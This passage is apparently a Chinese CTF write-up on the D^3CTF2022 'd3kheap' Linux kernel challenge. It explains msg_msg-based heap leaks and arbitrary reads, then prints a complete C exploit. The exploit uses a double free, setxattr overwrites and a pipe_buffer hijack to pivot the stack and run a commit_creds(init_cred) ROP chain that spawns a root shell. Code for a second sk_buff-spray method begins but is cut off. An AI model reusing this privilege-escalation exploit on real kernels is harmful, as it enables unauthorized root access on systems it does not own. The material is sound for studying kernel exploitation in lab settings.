    但这个方法有一个缺陷,无论是 MSG_COPY 还是常规的接收消息,其拷贝消息的过程的判断主要依据还是单向链表的 next 指针,因此若我们需要完成对特定地址向后的一块区域的读取,我们需要保证该地址上的数据为 NULL 。
  • 基于堆地址泄露的堆上连续内存搜索
    虽然我们不能直接读取当前 msg_msg 的 header,但我们不难想到的是:我们可以通过喷射大量的 msg_msg,从而利用越界读来读取其他 msg_msg 的 header,通过其双向链表成员泄露出一个“堆”上地址。
    由于任意地址读要求伪造的 msg_msgseg 的 next 为 NULL,因此我们不仅需要一个堆地址,还需要这个堆地址对应的 8 字节数据为 NULL 。由于 msg_msg 位于双向链表中,当我们越界读到其他 msg_msg 的 header,并且该 msg_msg 所在的双向链表中只有它一个 msg_msg 时,就可以根据链表指针找到该 msg_msg 对应的 msg_queue 。
    而由 msg_queue 的结构可知,msg_msg 的链表指针指向的是 msg_queue 的 q_messages,而 q_messages 往前 8 字节是 q_lrpid,它在尚未使用 msgrcv 接收过消息时为 NULL 。也就是说我们得到了一个堆上地址,同时这个地址上的数据为 NULL 。
    在我们完成对“堆”上地址的泄露之后,我们可以在每一次读取时挑选已知数据为 NULL 的区域作为 next->next 以避免 kernel panic,以此获得连续的搜索内存的能力,不过这需要我们拥有足够次数的更改 msg_msg 的 header 的能力。

例题:D^3CTF2022 - d3kheap

附件下载链接

存在一次 0x400 大小 object 的 double free 。

方法1

转换成 msg_msg 结构体的 UAF,利用 setxattr 对其进行修改。实测 0x400 的 object 的 free list 偏移较大,不会对利用造成影响。

首先 setxattr 修改 msg_msg 越界读泄露 msg_queue 地址。

setxattr 再次修改 msg_msg,任意地址读 msg_queue,泄露 double free 的 msg_msg 地址,用于之后伪造 pipe_buffer 的 ops 指针。

之后 setxattr 多次修改 msg_msg 任意地址读直至泄露内核地址。

之后将 msg_msg 结构体的 UAF 转换为 pipe_buffer 结构体的 UAF 然后劫持控制流+栈迁移执行 ROP 提权。由于有 double free 检测,因此需要先释放一个其他的 msg_msg 再释放被劫持的 msg_msg 。之后创建 pipe 劫持该 msg_msg 。利用 setxattr 修改 pipe_buffer 为下图所示后关闭 pipe 劫持程序执行流。

栈迁移有如下关键 gadget ,当调用 ops->release 函数时 rsi 寄存器指向 pipe_buffer 因此可以将栈迁移至 &pipe_buffer + 0x20 位置。在该位置构造提权 rop 完成提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
.text:FFFFFFFF812DBEDE push    rsi
.text:FFFFFFFF812DBEDF pop rsp
.text:FFFFFFFF812DBEE0 test edx, edx
.text:FFFFFFFF812DBEE2 jle loc_FFFFFFFF812DBF88
...
.text:FFFFFFFF812DBF88 ud2
.text:FFFFFFFF812DBF8A mov eax, 0FFFFFFEAh
.text:FFFFFFFF812DBF8F jmp short loc_FFFFFFFF812DBF2C
...
.text:FFFFFFFF812DBF2C pop rbx
.text:FFFFFFFF812DBF2D pop r12
.text:FFFFFFFF812DBF2F pop r13
.text:FFFFFFFF812DBF31 pop rbp
.text:FFFFFFFF812DBF32 retn
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sched.h>
#include <stdbool.h>
#include <sys/xattr.h>
#include<ctype.h>

/*
 * Restrict the calling process to the single CPU `core`.
 *
 * A failure of sched_setaffinity() is reported on stderr instead of
 * being ignored; the function still returns normally so callers keep
 * their best-effort behaviour.
 */
void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror("[-] sched_setaffinity");
    }
}

/*
 * Hex-dump a buffer as rows of four 64-bit words followed by the same
 * 32 bytes rendered as printable ASCII ('.' for everything else).
 *
 * desc  optional caption printed before the dump; may be NULL.
 * addr  start of the buffer.
 * len   buffer length in bytes; only whole qwords (len / 8) are shown.
 *
 * Both bounds checks are done in qword/byte units derived from len, so
 * a final row with fewer than four qwords no longer reads past the
 * buffer. Words are fetched with memcpy so addr needs no alignment.
 */
void qword_dump(const char *desc, const void *addr, int len) {
    const uint8_t *bytes = addr;
    const int qwords = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < qwords; i += 4) {
        printf(" %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            if (i + j < qwords) {
                uint64_t word;

                memcpy(&word, bytes + (size_t) (i + j) * 8, sizeof(word));
                printf(" 0x%016llx", (unsigned long long) word);
            } else {
                /* Pad a missing column to its full width so the ASCII pane stays aligned. */
                printf("%19s", "");
            }
        }
        printf(" ");
        for (int j = 0; j < 32 && i * 8 + j < qwords * 8; j++) {
            uint8_t ch = bytes[i * 8 + j];

            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

size_t user_cs, user_rflags, user_sp, user_ss;

/*
 * Snapshot the current user-mode cs, ss, rsp and rflags into the globals
 * user_cs, user_ss, user_sp and user_rflags. main() later places these
 * values at the end of its ROP chain.
 *
 * NOTE(review): the operands are written destination-first without
 * register prefixes, i.e. Intel syntax; this presumably requires
 * building with -masm=intel. Confirm against the build command.
 */
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*] status has been saved.");
}

void get_shell() { system("cat flag;/bin/sh"); }

struct list_head {
struct list_head *next, *prev;
};

/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
void *next; /* struct msg_msgseg *next; */
void *security; /* NULL without SELinux */
/* the actual message follows immediately */
};

struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
#define DATALEN_MSG ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

/* Create a fresh private System V message queue; returns its id, or -1 on error. */
int get_msg_queue(void) {
    const int flags = 0666 | IPC_CREAT;

    return msgget(IPC_PRIVATE, flags);
}

/*
 * Receive a message from msqid with no flags set.
 * Returns whatever msgrcv() returns.
 */
long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    const int no_flags = 0;

    return msgrcv(msqid, msgp, msgsz, msgtyp, no_flags);
}

/*
 * Stamp msgtyp into the mtype field at the start of msgp, then send
 * msgsz bytes of text to queue msqid with no flags set.
 * Returns whatever msgsnd() returns.
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    struct msgbuf *out = (struct msgbuf *) msgp;

    out->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

/*
 * Read a message without removing it from the queue.
 *
 * Uses MSG_COPY together with IPC_NOWAIT and MSG_NOERROR. With
 * MSG_COPY, msgtyp is the position of the message in the queue
 * (0 = first) rather than a message type.
 * Returns whatever msgrcv() returns.
 */
long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
    const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;

    return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}

/*
 * Fill in a struct msg_msg header at the start of the buffer `msg`.
 *
 * Each remaining argument is stored into the field of the same name;
 * pointer-typed fields receive the integer reinterpreted as an address.
 * Nothing beyond the header is touched.
 */
void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
               uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
    struct msg_msg *hdr = (struct msg_msg *) msg;

    hdr->m_list.next = (void *) m_list_next;
    hdr->m_list.prev = (void *) m_list_prev;
    hdr->m_type = (long) m_type;
    hdr->m_ts = m_ts;
    hdr->next = (void *) next;
    hdr->security = (void *) security;
}

struct {
long mtype;
char mtext[DATALEN_MSG + DATALEN_SEG];
} oob_msgbuf;

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

/*
 * Report whether addr lies in [0xFFFFFFFF80000000, 0xFFFFFFFFFEFFFFFF],
 * the range this program treats as kernel image addresses.
 * (A tighter upper bound of 0xFFFFFFFF9FFFFFFF was tried earlier.)
 */
bool is_kernel_text_addr(size_t addr) {
    const size_t lowest = 0xFFFFFFFF80000000;
    const size_t highest = 0xFFFFFFFFFEFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/*
 * Report whether addr lies in [0xFFFF888000000000, 0xFFFFc87FFFFFFFFF],
 * the range this program treats as direct-mapping (heap) addresses.
 */
bool is_dir_mapping_addr(size_t addr) {
    const size_t lowest = 0xFFFF888000000000;
    const size_t highest = 0xFFFFc87FFFFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

#define INVALID_KERNEL_OFFSET 0x1145141919810

/*
 * Reference addresses that kernel_offset_query() compares a leaked value
 * against: the difference between the leak and a matching entry is
 * returned as the kernel offset.
 * NOTE(review): presumably these are un-slid addresses of values that
 * commonly appear in heap memory of this particular kernel build;
 * confirm against the challenge's vmlinux.
 */
const size_t kernel_addr[] = {
0xffffffff812b76e9,
0xffffffff82101980,
0xffffffff82e77440,
0xffffffff82411de7,
0xffffffff817894f0,
0xffffffff833fac90,
0xffffffff823c3785,
0xffffffff810b2990,
0xffffffff82e49900,
0xffffffff8111b8b4,
0xffffffff8204ac40,
0xffffffff8155c320,
0xffffffff810d6ee0,
0xffffffff810e55e0,
0xffffffff82f05e80,
0xffffffff82ec0260,
0xffffffff8157a030,
0xffffffff81578190,
0xffffffff81531b30,
0xffffffff81531b00,
0xffffffff8153b150,
0xffffffff8153b2e0,
0xffffffff8149e380
};

/*
 * Try to turn one leaked value into a kernel offset.
 *
 * Returns INVALID_KERNEL_OFFSET when the value is outside the range
 * accepted by is_kernel_text_addr(), or when it matches no entry of
 * kernel_addr[]. An entry matches when the leak differs from it by a
 * multiple of 0x100000; that difference is returned.
 * (Equality of the low 20 bits already implies equality of the low 12
 * bits, so the separate page-offset comparison was redundant.)
 *
 * Values in range that match nothing are logged. The value is printed
 * with a size_t conversion, since passing an integer to %p is undefined.
 */
size_t kernel_offset_query(size_t kernel_text_leak) {
    if (!is_kernel_text_addr(kernel_text_leak)) {
        return INVALID_KERNEL_OFFSET;
    }
    for (size_t i = 0; i < sizeof(kernel_addr) / sizeof(kernel_addr[0]); i++) {
        size_t delta = kernel_text_leak - kernel_addr[i];

        if ((delta & 0xFFFFF) == 0) {
            return delta;
        }
    }
    printf("[-] unknown kernel addr: %#zx\n", kernel_text_leak);
    return INVALID_KERNEL_OFFSET;
}

/*
 * Scan buf (len bytes, examined as consecutive 8-byte words) for the
 * first word that kernel_offset_query() can resolve.
 *
 * Returns the resolved offset, or INVALID_KERNEL_OFFSET if no word
 * resolves. The hit is printed with size_t conversions, since passing
 * an integer to %p is undefined.
 */
size_t search_kernel_offset(void *buf, int len) {
    const size_t *words = buf;
    const int count = len / 8;

    for (int i = 0; i < count; i++) {
        size_t kernel_offset = kernel_offset_query(words[i]);

        if (kernel_offset == INVALID_KERNEL_OFFSET) {
            continue;
        }
        printf("[+] kernel leak addr: %#zx\n", words[i]);
        printf("[+] kernel offset: %#zx\n", kernel_offset);
        return kernel_offset;
    }
    return INVALID_KERNEL_OFFSET;
}

int d3heap_fd;

void chunk_add() {
ioctl(d3heap_fd, 0x1234);
}

void chunk_delete() {
ioctl(d3heap_fd, 0xdead);
}

#define HEAP_SIZE 1024
#define MSG_QUE_NUM 5

struct {
long mtype;
char mtext[HEAP_SIZE - sizeof(struct msg_msg)];
} msgbuf;

char fake_msg[HEAP_SIZE];

size_t init_cred = 0xffffffff82c6d580;
size_t commit_creds = 0xffffffff810d25c0;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00ff0;
size_t pop_rdi_ret = 0xffffffff810938f0;
size_t push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret = 0xffffffff812dbede;

/*
 * Driver for "method 1" of the write-up. The steps are strictly
 * order-dependent; statements must not be reordered.
 *
 * NOTE(review): comments that describe what the kernel does in response
 * are taken from the surrounding article, not from this code; treat them
 * as the author's stated intent.
 */
int main() {
/* Stay on one CPU and record the user-mode context used at the end of the ROP chain. */
bind_core(0);
save_status();
/* NOTE(review): the open() result is never checked. */
d3heap_fd = open("/dev/d3kheap", O_RDONLY);

/*
 * Step 1: issue the driver's add and delete ioctls, then send one message
 * to each of MSG_QUE_NUM fresh queues. Header plus text of every message
 * is exactly HEAP_SIZE bytes, and queue i gets m_type i + 1 so that a
 * leaked header identifies its queue.
 */
chunk_add();
chunk_delete();
int msqid[MSG_QUE_NUM];
for (int i = 0; i < MSG_QUE_NUM; i++) {
if ((msqid[i] = get_msg_queue()) < 0) {
puts("[-] mdgget failed.");
exit(-1);
}
memset(msgbuf.mtext, 'A' + (i % 26), sizeof(msgbuf.mtext));
msgbuf.mtype = i + 1;
if (write_msg(msqid[i], &msgbuf, sizeof(msgbuf.mtext), i + 1) < 0) {
puts("[-] msgnd failed.");
exit(-1);
}
}

/*
 * Step 2: second delete ioctl, then a setxattr() carrying a HEAP_SIZE-byte
 * fake header whose m_ts is DATALEN_MSG, followed by a MSG_COPY read of
 * message 0 in msqid[0] with the same size.
 * Presumably msqid[0]'s message is the one sharing the freed object.
 */
chunk_delete();
memset(fake_msg, '#', sizeof(fake_msg));
build_msg(fake_msg, 0, 0, 0, DATALEN_MSG, 0, 0);
setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);
if (peek_msg(msqid[0], &oob_msgbuf, DATALEN_MSG, 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}
printf("[*] msgbuf->mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("leak msg_queue addr from msg_msg", oob_msgbuf.mtext, DATALEN_MSG);
size_t kernel_offset = INVALID_KERNEL_OFFSET;
size_t msg_queue_addr = 0;
size_t msg_msg_offset;
int msg_queue_index = -1;
/*
 * Look at every HEAP_SIZE-aligned position after the first object for
 * something shaped like one of our own headers: next == prev (only
 * message in its queue), a direct-mapping pointer, our text size and one
 * of our m_type values. Types start at 2 because type 1 is msqid[0].
 */
for (int i = sizeof(msgbuf.mtext); i + HEAP_SIZE < DATALEN_MSG; i += HEAP_SIZE) {
struct msg_msg *msg_msg = (struct msg_msg *) &oob_msgbuf.mtext[i];
if (is_dir_mapping_addr((size_t) msg_msg->m_list.next)
&& msg_msg->m_list.next == msg_msg->m_list.prev
&& msg_msg->m_ts == sizeof(msgbuf.mtext)
&& msg_msg->m_type >= 2 && msg_msg->m_type <= MSG_QUE_NUM) {
msg_queue_addr = (size_t) msg_msg->m_list.next;
/* Distance from the start of the first object to the header that was found. */
msg_msg_offset = i + sizeof(struct msg_msg);
msg_queue_index = (int) msg_msg->m_type - 1;
break;
}
}
kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[sizeof(msgbuf.mtext)], DATALEN_MSG - sizeof(msgbuf.mtext));
if (msg_queue_addr) {
printf("[+] msg_queue addr: %p\n", msg_queue_addr);
printf("[*] msg_queue index: %d\n", msg_queue_index);
} else {
puts("[-] failed to leak heap.");
exit(-1);
}

/*
 * Step 3: same trick with a one-segment chain. next = msg_queue_addr - 8
 * makes the 8 bytes before the leaked list head act as the segment's
 * next field, so the segment data returned at mtext[DATALEN_MSG] starts
 * at msg_queue_addr. Its first qword is taken as the address of the
 * message found above.
 */
build_msg(fake_msg, 0, 0, 0, DATALEN_MSG + DATALEN_SEG, msg_queue_addr - 8, 0);
setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);
if (peek_msg(msqid[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}
printf("[*] msgbuf->mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("leak msg_msg addr from msg_queue", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
if (kernel_offset == INVALID_KERNEL_OFFSET) {
kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
}
size_t msg_msg_addr = *(size_t *) &oob_msgbuf.mtext[DATALEN_MSG];
printf("[+] msg_msg addr: %p\n", msg_msg_addr);

/*
 * Step 4: keep reading forward until some word resolves to a kernel
 * offset. Each round picks the last zero qword of the previous segment
 * dump; segment data byte k lives at cur_search_addr + 8 + k, so adding
 * (k + 8) moves cur_search_addr exactly onto that zero qword, which then
 * serves as the NULL next field of the following fake segment.
 */
size_t cur_search_addr = msg_queue_addr - 8;
while (kernel_offset == INVALID_KERNEL_OFFSET) {
size_t msg_offset = -1;
for (int i = DATALEN_MSG + DATALEN_SEG - 8; i >= DATALEN_MSG; i -= 8) {
if (!*(size_t *) &oob_msgbuf.mtext[i]) {
msg_offset = i - DATALEN_MSG + 8;
break;
}
}
if (msg_offset == -1) {
puts("[-] failed to find next msg.");
exit(-1);
}
cur_search_addr += msg_offset;
printf("[*] current searching addr: %p\n", cur_search_addr);
build_msg(fake_msg, 0, 0, 0, DATALEN_MSG + DATALEN_SEG, cur_search_addr, 0);
setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);
if (peek_msg(msqid[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}
printf("[*] msgbuf->mtype: %ld\n", oob_msgbuf.mtype);
qword_dump("leak kernel addr form heap space", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
}

/* Step 5: relocate every hard-coded kernel address by the recovered offset. */
init_cred += kernel_offset;
commit_creds += kernel_offset;
swapgs_restore_regs_and_return_to_usermode += kernel_offset;
pop_rdi_ret += kernel_offset;
push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret += kernel_offset;

/*
 * Step 6: write a header with the real text size and no segment, then
 * receive (and thereby free) first the neighbour's message and then the
 * one in msqid[0]. The article gives the double-free check as the reason
 * for this order.
 * NOTE(review): msg_msg_addr + 0x5000 is presumably just some mapped,
 * writable address for the unlink to write to; confirm.
 */
build_msg(fake_msg, msg_msg_addr + 0x5000, msg_msg_addr + 0x5000, 0, sizeof(msgbuf.mtext), 0, 0);
setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);

if (read_msg(msqid[msg_queue_index], &msgbuf, sizeof(msgbuf.mtext), 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}
if (read_msg(msqid[0], &msgbuf, sizeof(msgbuf.mtext), 0) < 0) {
puts("[-] msgrcv failed.");
return -1;
}

/*
 * Step 7: create two pipes; only the first pair of descriptors is kept.
 * NOTE(review): an empty compound-literal initialiser is not valid C11;
 * this relies on a compiler extension.
 */
int pipe_fd[2];
pipe(pipe_fd);
pipe((int[2]) {});

/* The first object starts msg_msg_offset bytes before the neighbour's header address. */
size_t pipe_buffer_addr = msg_msg_addr - msg_msg_offset;
printf("[+] pipe_buffer addr: %p\n", pipe_buffer_addr);
/*
 * Lay out the final payload inside fake_msg: ops points 0x100 bytes into
 * the same object, where only the release slot is filled in, and the
 * chain of return addresses starts at offset 0x20.
 */
struct pipe_buffer *pipe_buf = (void *) &fake_msg;
pipe_buf->ops = (void *) (pipe_buffer_addr + 0x100);
((struct pipe_buf_operations *) &fake_msg[0x100])->release = (void *) push_rsi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_rbp_ret;

size_t *rop = (size_t *) &fake_msg[0x20];
int rop_idx = 0;
rop[rop_idx++] = pop_rdi_ret;
rop[rop_idx++] = init_cred;
rop[rop_idx++] = commit_creds;
rop[rop_idx++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
/* Two filler slots, then the saved user-mode context captured by save_status(). */
rop[rop_idx++] = 0;
rop[rop_idx++] = 0;
rop[rop_idx++] = (size_t) get_shell;
rop[rop_idx++] = user_cs;
rop[rop_idx++] = user_rflags;
rop[rop_idx++] = user_sp;
rop[rop_idx++] = user_ss;

/* Write the payload, then close the pipe; per the article this is what invokes ops->release. */
setxattr("/flag", "sky123", pipe_buf, HEAP_SIZE, 0);
close(pipe_fd[0]);
close(pipe_fd[1]);

return 0;
}
方法 2

与第一种方法不同,第二种方法相比修改 msg_msg 的结构体由 setxattr 换成了 sk_buff 。由于 sk_buff 不会被立即释放因此可以使用堆喷,在真实环境中成功率更高。

和第一种方法一样利用 msg_msg 劫持释放的 object 。不过这里由于采用 msg_msg 堆喷的方式劫持,因此不知道哪个 msg_msg 劫持了 object 。
一种解决方法是再次释放 object,然后使用 sk_buff 堆喷申请回来,同时修改 msg_msg 的 m_ts 为一个很大的值。当获取 msg_msg 中的数据时,在 copy_msg 函数中如果我们用于读取的 buffer 的大小小于 m_ts 会返回异常,根据这个可以判断出哪个 msg_msg 劫持了 object 。

1
2
3
4
5
6
7
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
...
if (src->m_ts > dst->m_ts)// 有个 size 检查
return ERR_PTR(-EINVAL);
...
}

之后参考第一种方法泄露 msg_msg 的地址,之后修复并释放 msg_msg 然后堆喷 pipe_buffer 劫持。
读取 sk_buff 泄露 pipe_buffer->ops 从而泄露内核基址。然后参考方法 1 修改 pipe_buffer 提权。

由于 sk_buff 既可以写又可以读并且不会立即释放,相对于第一种方法只能 msg_msg 读,setxattr 写来说利用方式更加容易,可以借助堆喷提升成功率,对利用环境要求更小。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sched.h>
#include <stdbool.h>
#include<ctype.h>

/*
 * Restrict the calling process to the single CPU `core`.
 *
 * A failure of sched_setaffinity() is reported on stderr instead of
 * being ignored; the function still returns normally so callers keep
 * their best-effort behaviour.
 */
void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror("[-] sched_setaffinity");
    }
}

size_t user_cs, user_rflags, user_sp, user_ss;

/*
 * Snapshot the current user-mode cs, ss, rsp and rflags into the globals
 * user_cs, user_ss, user_sp and user_rflags. main() later places these
 * values at the end of its ROP chain.
 *
 * NOTE(review): the operands are written destination-first without
 * register prefixes, i.e. Intel syntax; this presumably requires
 * building with -masm=intel. Confirm against the build command.
 */
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*] status has been saved.");
}

/*
 * Hex-dump a buffer as rows of four 64-bit words followed by the same
 * 32 bytes rendered as printable ASCII ('.' for everything else).
 *
 * desc  optional caption printed before the dump; may be NULL.
 * addr  start of the buffer.
 * len   buffer length in bytes; only whole qwords (len / 8) are shown.
 *
 * Both bounds checks are done in qword/byte units derived from len, so
 * a final row with fewer than four qwords no longer reads past the
 * buffer. Words are fetched with memcpy so addr needs no alignment.
 */
void qword_dump(const char *desc, const void *addr, int len) {
    const uint8_t *bytes = addr;
    const int qwords = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < qwords; i += 4) {
        printf(" %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            if (i + j < qwords) {
                uint64_t word;

                memcpy(&word, bytes + (size_t) (i + j) * 8, sizeof(word));
                printf(" 0x%016llx", (unsigned long long) word);
            } else {
                /* Pad a missing column to its full width so the ASCII pane stays aligned. */
                printf("%19s", "");
            }
        }
        printf(" ");
        for (int j = 0; j < 32 && i * 8 + j < qwords * 8; j++) {
            uint8_t ch = bytes[i * 8 + j];

            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

struct list_head {
struct list_head *next, *prev;
};

/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
void *next; /* struct msg_msgseg *next; */
void *security; /* NULL without SELinux */
/* the actual message follows immediately */
};

struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
#define DATALEN_MSG ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

int get_msg_queue(void) {
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
((struct msgbuf *) msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
((struct msg_msg *) msg)->m_list.next = (void *) m_list_next;
((struct msg_msg *) msg)->m_list.prev = (void *) m_list_prev;
